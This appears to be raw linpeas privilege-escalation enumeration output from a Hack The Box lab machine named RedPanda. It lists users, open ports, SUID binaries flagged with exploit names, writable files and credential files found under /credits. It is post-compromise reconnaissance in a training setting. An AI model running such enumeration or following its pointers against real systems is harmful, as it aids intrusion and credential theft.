org.freedesktop.network1 - - - (activatable) - - -
org.freedesktop.resolve1 1090 systemd-resolve systemd-resolve :1.9 systemd-resolved.service - -
org.freedesktop.systemd1 1 systemd root :1.4 init.scope - -
org.freedesktop.thermald - - - (activatable) - - -
org.freedesktop.timedate1 - - - (activatable) - - -
org.freedesktop.timesync1 638 systemd-timesyn systemd-timesync :1.0 systemd-timesyncd.service - -
╔═════════════════════╗
════════════════════════════════════════╣ Network Information ╠════════════════════════════════════════
╚═════════════════════╝
╔══════════╣ Hostname, hosts and DNS
redpanda
127.0.0.1 localhost redpanda.htb
127.0.1.1 redpanda
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
nameserver 127.0.0.53
options edns0 trust-ad
╔══════════╣ Interfaces
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.11.170 netmask 255.255.254.0 broadcast 10.10.11.255
inet6 fe80::250:56ff:feb9:f29 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:feb9:f29 prefixlen 64 scopeid 0x0<global>
ether 00:50:56:b9:0f:29 txqueuelen 1000 (Ethernet)
RX packets 195187 bytes 23219352 (23.2 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 129002 bytes 16878815 (16.8 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 17246 bytes 2153061 (2.1 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 17246 bytes 2153061 (2.1 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::8080 :::* LISTEN 883/java
╔══════════╣ Can I sniff with tcpdump?
No
╔═══════════════════╗
═════════════════════════════════════════╣ Users Information ╠═════════════════════════════════════════
╚═══════════════════╝
╔══════════╣ My user
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#users
uid=1000(woodenk) gid=1001(logs) groups=1001(logs),1000(woodenk)
╔══════════╣ Do I have PGP keys?
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
╔══════════╣ Checking sudo tokens
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#reusing-sudo-tokens
ptrace protection is enabled (1)
gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it
╔══════════╣ Checking Pkexec policy
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe#pe-method-2
[Configuration]
AdminIdentities=unix-user:0
[Configuration]
AdminIdentities=unix-group:sudo;unix-group:admin
╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash
╔══════════╣ Users with console
root:x:0:0:root:/root:/bin/bash
woodenk:x:1000:1000:,,,:/home/woodenk:/bin/bash
╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
uid=1000(woodenk) gid=1000(woodenk) groups=1000(woodenk)
uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)
uid=102(systemd-timesync) gid=104(systemd-timesync) groups=104(systemd-timesync)
uid=103(messagebus) gid=106(messagebus) groups=106(messagebus)
uid=104(syslog) gid=110(syslog) groups=110(syslog),4(adm),5(tty)
uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=106(tss) gid=111(tss) groups=111(tss)
uid=107(uuidd) gid=112(uuidd) groups=112(uuidd)
uid=108(tcpdump) gid=113(tcpdump) groups=113(tcpdump)
uid=109(landscape) gid=115(landscape) groups=115(landscape)
uid=110(pollinate) gid=1(daemon) groups=1(daemon)
uid=111(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=112(usbmux) gid=46(plugdev) groups=46(plugdev)
uid=113(mysql) gid=118(mysql) groups=118(mysql)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=998(lxd) gid=100(users) groups=100(users)
uid=999(systemd-coredump) gid=999(systemd-coredump) groups=999(systemd-coredump)
╔══════════╣ Login now
11:32:52 up 2:31, 0 users, load average: 0.13, 0.06, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
╔══════════╣ Last logons
woodenk pts/2 Mon Sep 12 09:30:06 2022 - Mon Sep 12 09:34:31 2022 (00:04) 10.10.16.9
woodenk pts/1 Mon Sep 12 09:28:47 2022 - Mon Sep 12 09:34:31 2022 (00:05) 10.10.16.9
reboot system boot Mon Sep 12 09:00:57 2022 still running 0.0.0.0
woodenk pts/0 Tue Jul 5 05:51:25 2022 - Tue Jul 5 05:53:14 2022 (00:01) 10.10.14.23
reboot system boot Tue Jul 5 05:49:47 2022 - Tue Jul 5 05:53:16 2022 (00:03) 0.0.0.0
root tty1 Thu Jun 30 13:17:41 2022 - down (00:00) 0.0.0.0
reboot system boot Thu Jun 30 13:17:15 2022 - Thu Jun 30 13:18:04 2022 (00:00) 0.0.0.0
wtmp begins Thu Jun 30 13:17:15 2022
╔══════════╣ Last time logon each user
Username Port From Latest
root tty1 Thu Jun 30 13:17:41 +0000 2022
woodenk pts/2 10.10.16.9 Mon Sep 12 09:30:06 +0000 2022
╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)
╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!
╔══════════════════════╗
═══════════════════════════════════════╣ Software Information ╠═══════════════════════════════════════
╚══════════════════════╝
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/nc
/usr/bin/netcat
/usr/bin/perl
/usr/bin/ping
/usr/bin/python3
/usr/bin/sudo
/usr/bin/wget
╔══════════╣ Installed Compilers
╔══════════╣ MySQL version
mysql Ver 8.0.29-0ubuntu0.20.04.3 for Linux on x86_64 ((Ubuntu))
═╣ MySQL connection using default root/root ........... No
═╣ MySQL connection using root/toor ................... No
═╣ MySQL connection using root/NOPASS ................. No
╔══════════╣ Searching mysql credentials and exec
From '/etc/mysql/mysql.conf.d/mysqld.cnf' Mysql user: user = mysql
Found readable /etc/mysql/my.cnf
!includedir /etc/mysql/conf.d/
!includedir /etc/mysql/mysql.conf.d/
╔══════════╣ Analyzing MariaDB Files (limit 70)
-rw------- 1 root root 317 Jun 14 11:54 /etc/mysql/debian.cnf
╔══════════╣ Analyzing Rsync Files (limit 70)
-rw-r--r-- 1 root root 1044 Feb 7 2022 /usr/share/doc/rsync/examples/rsyncd.conf
[ftp]
comment = public archive
path = /var/www/pub
use chroot = yes
lock file = /var/lock/rsyncd
read only = yes
list = yes
uid = nobody
gid = nogroup
strict modes = yes
ignore errors = no
ignore nonreadable = yes
transfer logging = no
timeout = 600
refuse options = checksum dry-run
dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz
╔══════════╣ Analyzing Ldap Files (limit 70)
The password hash is from the {SSHA} to 'structural'
drwxr-xr-x 2 root root 4096 Jun 14 14:35 /etc/ldap
╔══════════╣ Searching ssl/ssh files
PermitRootLogin yes
ChallengeResponseAuthentication no
UsePAM yes
PasswordAuthentication yes
══╣ Some certificates were found (out limited):
/etc/pki/fwupd-metadata/LVFS-CA.pem
/etc/pki/fwupd/LVFS-CA.pem
/etc/pollinate/entropy.ubuntu.com.pem
/var/lib/fwupd/pki/client.pem
7178PSTORAGE_CERTSBIN
gpg-connect-agent: no running gpg-agent - starting '/usr/bin/gpg-agent'
gpg-connect-agent: waiting for the agent to come up ... (5s)
gpg-connect-agent: connection to agent established
══╣ Some home ssh config file was found
/usr/share/openssh/sshd_config
Include /etc/ssh/sshd_config.d/*.conf
ChallengeResponseAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem sftp /usr/lib/openssh/sftp-server
══╣ /etc/hosts.allow file found, trying to read the rules:
/etc/hosts.allow
Searching inside /etc/ssh/ssh_config for interesting info
Include /etc/ssh/ssh_config.d/*.conf
Host *
SendEnv LANG LC_*
HashKnownHosts yes
GSSAPIAuthentication yes
╔══════════╣ Analyzing PAM Auth Files (limit 70)
drwxr-xr-x 2 root root 4096 Jun 14 14:35 /etc/pam.d
-rw-r--r-- 1 root root 2133 Feb 26 2020 /etc/pam.d/sshd
╔══════════╣ Searching tmux sessions
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions
tmux 3.0a
/tmp/tmux-1000
╔══════════╣ Analyzing Keyring Files (limit 70)
drwxr-xr-x 2 root root 4096 Jul 5 05:52 /usr/share/keyrings
╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd
passwd file: /etc/passwd
passwd file: /usr/share/bash-completion/completions/passwd
passwd file: /usr/share/lintian/overrides/passwd
╔══════════╣ Analyzing PGP-GPG Files (limit 70)
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found
-rw-r--r-- 1 root root 2796 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
-rw-r--r-- 1 root root 2794 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
-rw-r--r-- 1 root root 1733 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
-rw-r--r-- 1 root root 3267 Jan 6 2021 /usr/share/gnupg/distsigkey.gpg
-rw-r--r-- 1 root root 2247 Apr 1 13:27 /usr/share/keyrings/ubuntu-advantage-cc-eal.gpg
-rw-r--r-- 1 root root 2274 Jan 25 2021 /usr/share/keyrings/ubuntu-advantage-cis.gpg
-rw-r--r-- 1 root root 2236 Oct 15 2020 /usr/share/keyrings/ubuntu-advantage-esm-apps.gpg
-rw-r--r-- 1 root root 2264 Oct 15 2020 /usr/share/keyrings/ubuntu-advantage-esm-infra-trusty.gpg
-rw-r--r-- 1 root root 2275 Oct 15 2020 /usr/share/keyrings/ubuntu-advantage-fips.gpg
-rw-r--r-- 1 root root 2250 Apr 15 14:10 /usr/share/keyrings/ubuntu-advantage-realtime-kernel.gpg
-rw-r--r-- 1 root root 2235 Apr 1 13:27 /usr/share/keyrings/ubuntu-advantage-ros.gpg
-rw-r--r-- 1 root root 7399 Sep 17 2018 /usr/share/keyrings/ubuntu-archive-keyring.gpg
-rw-r--r-- 1 root root 6713 Oct 27 2016 /usr/share/keyrings/ubuntu-archive-removed-keys.gpg
-rw-r--r-- 1 root root 4097 Feb 6 2018 /usr/share/keyrings/ubuntu-cloudimage-keyring.gpg
-rw-r--r-- 1 root root 0 Jan 17 2018 /usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg
-rw-r--r-- 1 root root 1227 May 27 2010 /usr/share/keyrings/ubuntu-master-keyring.gpg
-rw-r--r-- 1 root root 2867 Feb 13 2020 /usr/share/popularity-contest/debian-popcon.gpg
╔══════════╣ Analyzing Cache Vi Files (limit 70)
-rw-r--r-- 1 root root 12288 Jun 20 14:05 /opt/panda_search/target/classes/static/css/.main.css.swp
-rw-r--r-- 1 root root 12288 Apr 26 11:33 /opt/panda_search/target/classes/templates/.search.html.swp
-rw-r--r-- 1 root root 12288 Apr 25 09:28 /opt/panda_search/target/classes/templates/.stats.html.swp
╔══════════╣ Kubernetes information
╔══════════╣ Analyzing Bind Files (limit 70)
-rw-r--r-- 1 root root 832 Feb 2 2020 /usr/share/bash-completion/completions/bind
-rw-r--r-- 1 root root 832 Feb 2 2020 /usr/share/bash-completion/completions/bind
╔══════════╣ Analyzing Windows Files Files (limit 70)
lrwxrwxrwx 1 root root 20 Jun 14 11:54 /etc/alternatives/my.cnf -> /etc/mysql/mysql.cnf
lrwxrwxrwx 1 root root 24 Jun 14 11:54 /etc/mysql/my.cnf -> /etc/alternatives/my.cnf
-rw-r--r-- 1 root root 81 Jun 14 11:54 /var/lib/dpkg/alternatives/my.cnf
╔══════════╣ Analyzing Other Interesting Files Files (limit 70)
-rw-r--r-- 1 root root 3771 Feb 25 2020 /etc/skel/.bashrc
-rw-r--r-- 1 woodenk woodenk 3938 Jun 14 12:37 /home/woodenk/.bashrc
-rw-r--r-- 1 root root 807 Feb 25 2020 /etc/skel/.profile
-rw-r--r-- 1 woodenk woodenk 807 Jun 14 11:12 /home/woodenk/.profile
╔═══════════════════╗
═════════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════
╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
strings Not Found
-rwsr-xr-- 1 root messagebus 51K Apr 29 12:03 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 15K Jul 8 2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 23K Feb 21 2022 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 463K Mar 30 13:03 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 55K Feb 7 2022 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 163K Jan 19 2021 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 87K Mar 14 08:26 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 39K Feb 7 2022 /usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 67K Mar 14 08:26 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 39K Mar 7 2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 52K Mar 14 08:26 /usr/bin/chsh
-rwsr-sr-x 1 daemon daemon 55K Nov 12 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 84K Mar 14 08:26 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 44K Mar 14 08:26 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 67K Feb 7 2022 /usr/bin/su
╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
-rwxr-sr-x 1 root shadow 43K Sep 17 2021 /usr/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 43K Sep 17 2021 /usr/sbin/unix_chkpwd
-rwxr-sr-x 1 root utmp 15K Sep 30 2019 /usr/lib/x86_64-linux-gnu/utempter/utempter
-rwxr-sr-x 1 root tty 35K Feb 7 2022 /usr/bin/wall
-rwxr-sr-x 1 root ssh 343K Mar 30 13:03 /usr/bin/ssh-agent
-rwxr-sr-x 1 root shadow 31K Mar 14 08:26 /usr/bin/expiry
-rwxr-sr-x 1 root tty 15K Mar 30 2020 /usr/bin/bsd-write
-rwxr-sr-x 1 root shadow 83K Mar 14 08:26 /usr/bin/chage
-rwsr-sr-x 1 daemon daemon 55K Nov 12 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwxr-sr-x 1 root crontab 43K Feb 13 2020 /usr/bin/crontab
╔══════════╣ Checking misconfigurations of ld.so
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#ld-so
/etc/ld.so.conf
include /etc/ld.so.conf.d/*.conf
/etc/ld.so.conf.d
/etc/ld.so.conf.d/libc.conf
/usr/local/lib
/etc/ld.so.conf.d/x86_64-linux-gnu.conf
/usr/local/lib/x86_64-linux-gnu
/lib/x86_64-linux-gnu
/usr/lib/x86_64-linux-gnu
╔══════════╣ Capabilities
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities
Current capabilities:
Current: =
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
Shell capabilities:
0x0000000000000000=
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
Files with capabilities (limited to 50):
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
╔══════════╣ Users with capabilities
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities
╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#acls
files with acls in searched folders Not Found
╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path
/usr/bin/gettext.sh
/usr/bin/rescan-scsi-bus.sh
╔══════════╣ Unexpected in root
/credits
╔══════════╣ Files (scripts) in /etc/profile.d/
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#profiles-files
total 32
drwxr-xr-x 2 root root 4096 Jun 14 14:35 .
drwxr-xr-x 105 root root 4096 Jul 5 05:52 ..
-rw-r--r-- 1 root root 96 Dec 5 2019 01-locale-fix.sh
-rw-r--r-- 1 root root 1557 Feb 17 2020 Z97-byobu.sh
-rw-r--r-- 1 root root 729 Feb 2 2020 bash_completion.sh
-rw-r--r-- 1 root root 1003 Aug 13 2019 cedilla-portuguese.sh
-rw-r--r-- 1 root root 1107 Nov 3 2019 gawk.csh
-rw-r--r-- 1 root root 757 Nov 3 2019 gawk.sh
╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ No
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No
╔══════════╣ Searching root files in home dirs (limit 30)
/home/
/home/woodenk/.bash_history
/home/woodenk/user.txt
/root/
╔══════════╣ Searching folders owned by me containing others files on it (limit 100)
/home/woodenk
╔══════════╣ Readable files belonging to root and readable by me but not world readable
-rw-r----- 1 root logs 422 Sep 12 10:42 /credits/damian_creds.xml
-rw-r----- 1 root logs 426 Sep 12 10:54 /credits/woodenk_creds.xml
-rw-r----- 1 root woodenk 33 Sep 12 09:01 /home/woodenk/user.txt
╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/opt/panda_search/redpanda.log
/tmp/hsperfdata_woodenk/883
/home/woodenk/.gnupg/pubring.kbx
/home/woodenk/.gnupg/trustdb.gpg
/var/log/syslog
/var/log/journal/8e7b2e7692df48faa4e42d6cfc791ed2/system.journal
/var/log/journal/8e7b2e7692df48faa4e42d6cfc791ed2/user-1000.journal
/var/log/auth.log
╔══════════╣ Writable log files (logrotten) (limit 100)
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation
logrotate 3.14.0
Default mail command: /usr/bin/mail
Default compress command: /bin/gzip
Default uncompress command: /bin/gunzip
Default compress extension: .gz
Default state file path: /var/lib/logrotate/status
ACL support: yes
SELinux support: yes
╔══════════╣ Files inside /home/woodenk (limit 20)
total 796
drwxr-xr-x 6 woodenk woodenk 4096 Sep 12 11:32 .
drwxr-xr-x 3 root root 4096 Jun 14 14:35 ..
lrwxrwxrwx 1 root root 9 Jun 14 11:38 .bash_history -> /dev/null
-rw-r--r-- 1 woodenk woodenk 220 Jun 14 11:12 .bash_logout
-rw-r--r-- 1 woodenk woodenk 3938 Jun 14 12:37 .bashrc
drwx------ 2 woodenk woodenk 4096 Jun 23 19:04 .cache
drwx------ 3 woodenk logs 4096 Sep 12 11:32 .gnupg
drwxrwxr-x 3 woodenk woodenk 4096 Jun 14 14:35 .local
drwxrwxr-x 4 woodenk woodenk 4096 Jun 14 14:35 .m2
-rw-r--r-- 1 woodenk woodenk 807 Jun 14 11:12 .profile
-rwxrw-r-- 1 woodenk logs 770491 Jul 1 10:40 linpeas.sh
-rw-r----- 1 root woodenk 33 Sep 12 09:01 user.txt
╔══════════╣ Files inside others home (limit 20)
╔══════════╣ Searching installed mail applications
╔══════════╣ Mails (limit 50)
╔══════════╣ Backup folders
╔══════════╣ Backup files (limited 100)
-rw-r--r-- 1 root root 3696 Jun 20 15:58 /opt/credit-score/LogParser/final/pom.xml.bak
-rwxr-xr-x 1 root root 226 Feb 17 2020 /usr/share/byobu/desktop/byobu.desktop.old
-rw-r--r-- 1 root root 392817 Feb 9 2020 /usr/share/doc/manpages/Changes.old.gz
-rw-r--r-- 1 root root 7867 Jul 16 1996 /usr/share/doc/telnet/README.old.gz
-rw-r--r-- 1 root root 11886 Jun 14 12:58 /usr/share/info/dir.old
-rw-r--r-- 1 root root 2756 Feb 13 2020 /usr/share/man/man8/vgcfgbackup.8.gz
-rw-r--r-- 1 root root 0 Jun 15 13:13 /usr/src/linux-headers-5.4.0-121-generic/include/config/wm831x/backup.h
-rw-r--r-- 1 root root 0 Jun 15 13:13 /usr/src/linux-headers-5.4.0-121-generic/include/config/net/team/mode/activebackup.h
-rw-r--r-- 1 root root 237986 Jun 15 13:13 /usr/src/linux-headers-5.4.0-121-generic/.config.old
-rwxr-xr-x 1 root root 1086 Nov 25 2019 /usr/src/linux-headers-5.4.0-121/tools/testing/selftests/net/tcp_fastopen_backup_key.sh
-rw-r--r-- 1 root root 44048 Oct 12 2021 /usr/lib/x86_64-linux-gnu/open-vm-tools/plugins/vmsvc/libvmbackup.so
-rw-r--r-- 1 root root 9833 Jun 15 13:13 /usr/lib/modules/5.4.0-121-generic/kernel/drivers/power/supply/wm831x_backup.ko
-rw-r--r-- 1 root root 9073 Jun 15 13:13 /usr/lib/modules/5.4.0-121-generic/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 1802 Feb 15 2022 /usr/lib/python3/dist-packages/sos/report/plugins/ovirt_engine_backup.py
-rw-r--r-- 1 root root 1413 Jun 14 12:58 /usr/lib/python3/dist-packages/sos/report/plugins/__pycache__/ovirt_engine_backup.cpython-38.pyc
-rw-r--r-- 1 root root 39448 May 4 12:36 /usr/lib/mysql/plugin/component_mysqlbackup.so
-rw-r--r-- 1 root root 2743 Apr 23 2020 /etc/apt/sources.list.curtin.old
╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found: /var/lib/PackageKit/transactions.db: SQLite 3.x database, last written using SQLite version 3031001
Found: /var/lib/command-not-found/commands.db: SQLite 3.x database, last written using SQLite version 3031001
Found: /var/lib/fwupd/pending.db: SQLite 3.x database, last written using SQLite version 3031001
-> Extracting tables from /var/lib/PackageKit/transactions.db (limit 20)
-> Extracting tables from /var/lib/command-not-found/commands.db (limit 20)
-> Extracting tables from /var/lib/fwupd/pending.db (limit 20)
╔══════════╣ Web files?(output limit)
╔══════════╣ All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw-rw-r-- 1 root root 6148 Dec 14 2021 /opt/panda_search/src/main/resources/static/.DS_Store
-rw-rw-r-- 1 root root 6148 Dec 14 2021 /opt/panda_search/src/main/resources/static/img/.DS_Store
-rw-rw-r-- 1 root root 6148 Dec 14 2021 /opt/panda_search/src/main/resources/.DS_Store
-rw-rw-r-- 1 root root 6148 Dec 14 2021 /opt/panda_search/src/main/resources/templates/.DS_Store
-rw-rw-r-- 1 root root 6148 Dec 14 2021 /opt/panda_search/src/main/.DS_Store
-rw-r--r-- 1 root root 2047 Apr 23 13:02 /usr/lib/jvm/.java-1.11.0-openjdk-amd64.jinfo
-rw-r--r-- 1 woodenk woodenk 220 Jun 14 11:12 /home/woodenk/.bash_logout
-rw-r--r-- 1 root root 220 Feb 25 2020 /etc/skel/.bash_logout
-rw------- 1 root root 0 Apr 23 2020 /etc/.pwd.lock
-rw-r--r-- 1 root root 0 Jun 14 12:04 /etc/.java/.systemPrefs/.system.lock
-rw-r--r-- 1 root root 0 Jun 14 12:04 /etc/.java/.systemPrefs/.systemRootModFile
-rw-r--r-- 1 landscape landscape 0 Apr 23 2020 /var/lib/landscape/.cleanup.user
-rw-r--r-- 1 root root 0 Sep 12 09:01 /run/network/.ifstate.lock
╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-rwxrwxr-x 1 woodenk logs 765823 Sep 12 11:29 /tmp/hsperfdata_woodenk/linpeas.sh
-rw------- 1 woodenk logs 32768 Sep 12 11:32 /tmp/hsperfdata_woodenk/883
-rw-r--r-- 1 root root 39509 Jul 5 05:52 /var/backups/apt.extended_states.0
-rw-r--r-- 1 root root 4206 Jun 14 14:30 /var/backups/apt.extended_states.1.gz
-rw-r--r-- 1 root root 677272 Jun 14 14:30 /var/backups/dpkg.status.0
-rw-r--r-- 1 root root 268 May 7 2020 /var/backups/dpkg.diversions.0
-rw-r--r-- 1 root root 81920 Jun 17 06:25 /var/backups/alternatives.tar.0
-rw-r--r-- 1 root root 100 Apr 23 2020 /var/backups/dpkg.statoverride.0
╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/home/woodenk
/opt/panda_search/src/main/resources/static/css/panda.css
/opt/panda_search/target/classes/static/css/panda.css
/opt/panda_search/target/panda.css.map
/run/lock
/run/screen
/tmp
/tmp/.ICE-unix
/tmp/.Test-unix
/tmp/.X11-unix
/tmp/.XIM-unix
/tmp/.font-unix
#)You_can_write_even_more_files_inside_last_directory
/tmp/hsperfdata_woodenk/883
/tmp/hsperfdata_woodenk/linpeas.sh
/tmp/tmux-1000
/tmp/tomcat-docbase.8080.3786991954686091370
/tmp/tomcat.8080.1605307941942746866
/tmp/tomcat.8080.1605307941942746866/work
/tmp/tomcat.8080.1605307941942746866/work/Tomcat
/tmp/tomcat.8080.1605307941942746866/work/Tomcat/localhost
/tmp/tomcat.8080.1605307941942746866/work/Tomcat/localhost/ROOT
/var/crash
/var/tmp
╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
Group logs:
/opt/panda_search/redpanda.log
/tmp/hsperfdata_woodenk/linpeas.sh
/tmp/tomcat.8080.1605307941942746866/work
/tmp/tomcat.8080.1605307941942746866/work/Tomcat
/tmp/tomcat.8080.1605307941942746866/work/Tomcat/localhost
/tmp/tomcat.8080.1605307941942746866/work/Tomcat/localhost/ROOT
╔══════════╣ Searching passwords in history files
╔══════════╣ Searching *password* or *credential* files in home (limit 70)
/etc/pam.d/common-password
/usr/bin/systemd-ask-password
/usr/bin/systemd-tty-ask-password-agent
/usr/lib/git-core/git-credential
/usr/lib/git-core/git-credential-cache
/usr/lib/git-core/git-credential-cache--daemon
/usr/lib/git-core/git-credential-store
#)There are more creds/passwds files in the previous parent folder
/usr/lib/grub/i386-pc/password.mod
/usr/lib/grub/i386-pc/password_pbkdf2.mod
/usr/lib/mysql/plugin/component_validate_password.so
/usr/lib/mysql/plugin/validate_password.so
/usr/lib/python3/dist-packages/keyring/__pycache__/credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/keyring/credentials.py
/usr/lib/python3/dist-packages/launchpadlib/__pycache__/credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/launchpadlib/credentials.py
/usr/lib/python3/dist-packages/launchpadlib/tests/__pycache__/test_credential_store.cpython-38.pyc
/usr/lib/python3/dist-packages/launchpadlib/tests/test_credential_store.py
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/client_credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/resource_owner_password_credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/client_credentials.py
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/resource_owner_password_credentials.py
